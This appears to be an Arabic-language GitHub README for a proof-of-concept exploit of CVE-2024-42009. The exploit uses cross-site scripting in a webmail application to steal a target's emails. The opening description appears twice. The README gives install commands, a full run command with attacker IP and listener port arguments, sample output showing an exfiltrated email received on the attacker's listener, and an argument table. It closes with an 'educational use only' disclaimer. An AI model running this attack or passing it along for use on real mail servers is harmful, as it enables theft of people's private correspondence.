
يُظهر إثبات المفهوم (PoC) هذا استغلالًا لـ CVE-2024-42009، مستفيدًا من ثغرة البرمجة النصية عبر المواقع (XSS) لاستخراج رسائل البريد الإلكتروني من تطبيق ويب ميل مستهدف. يُحقن الهجوم حمولة ضارة تقوم بتسريب محتوى البريد الإلكتروني إلى مستمع يتحكم به المهاجم.
يُظهر هذا الإثبات المفاهيمي (PoC) استغلالًا لثغرة CVE-2024-42009، مستفيدًا من ثغرة البرمجة النصية عبر المواقع (XSS) لاستخراج رسائل البريد الإلكتروني من تطبيق ويب ميل مستهدف. يقوم الهجوم بحقن حمولة ضارة تقوم بتسريب محتوى البريد الإلكتروني إلى مستمع يتحكم به المهاجم.
pip install requests beautifulsoup4
قم بتشغيل السكربت مع الوسائط اللازمة:
python exploit.py -fu [email protected] -tu [email protected] -u http://target.com/contact -ip YOUR_IP -p 1337
[*] CVE-2024-42009 PoC: الاستماع على 192.168.1.100:1337...
[*] إرسال الحمولة لـ UID 1...
[+] تم إرسال الحمولة لـ UID 1 (الحالة: 200)
[+] محتوى البريد المستلم:
Hello, this is a test email!
أنا لا أدّعي الملكية أو الإفصاح عن الثغرة وجميع الاستغلالات المقابلة المستضافة في هذا المستودع على GitHub - كل الفضل يعود إلى الباحث الذي اكتشفها؛ لقد قمت فقط بإنشاء PoC لتكرار الثغرة بناءً على البيانات من الإنترنت. هذا PoC مخصص للأغراض التعليمية والبحثية فقط. الاختبار غير المصرح به ضد الأنظمة دون موافقة غير قانوني. استخدمه بمسؤولية!
| الوسيط | الوصف |
|---|
-fu, --from-user | عنوان البريد الإلكتروني للمرسل |
-tu, --to-user | عنوان البريد الإلكتروني للمستلم |
-u, --target-url | رابط تطبيق البريد المستهدف |
-ip, --server-ip | عنوان IP لمستمع المهاجم |
-p, --server-port | المنفذ للمستمع (الافتراضي: 1337) |